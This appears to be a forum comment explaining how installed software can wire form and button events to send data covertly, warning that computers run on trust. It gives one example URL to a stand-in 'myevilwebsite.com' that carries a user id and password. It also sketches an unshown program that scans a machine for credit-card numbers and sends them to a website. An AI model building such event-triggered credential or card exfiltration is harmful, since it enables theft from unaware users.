Why do I get this terrible feeling that you know what you're talking about - and that you're right on this issue?
I have never done malicious stuff on a machine. I am insured for $5M so that I WON’T do stuff like that.
Whenever a piece of software is run on a system, we have events that happen. An event is stuff like mouse move, mouse hover, form close, form closing, form initialized, etc. About 100 events on a Windows form. Same is true of Linux or Macs because computing is computing. The old days didn’t work like that but let’s ignore it for now.
Any event can be wired to do anything. Hence, I could wire an event to pass your credentials to a website.
Take a simple example:
http://www.myevilwebsite.com?runProgram=getUserId;uid=****;pw=****
Whenever you open up a form and start typing, I can wire up the Ok and Cancel button events, call the above website, and pass in whatever I wanted to to the cgi parms at the end. Calling a website would happen without you ever seeing a web browser and without you ever knowing. You could use a network sniffer like Fiddler but you wouldn’t check that. End users understand the web as a browser when it isn’t.
I can also hide everything from you through encryption so that you couldn’t even discern it if you wanted to.
Basically, computers operate 100% on trust and numbers. If you trust my app, the system can belong to me. People can scream all day long about Windows, Linux, and Macs but you click ok and game on.
People worry about viruses but it is the click to installthat is an issue. I could have you hover over an app, detect the hover, automatically scan your machine for all numbers on it that meet a credit card regex, then send them to a website. That is a very simple exploit and would take me around 1 hour to code. And the worst part is that there is absolutely nothing you can do to stop it ONCE the malware is introduced.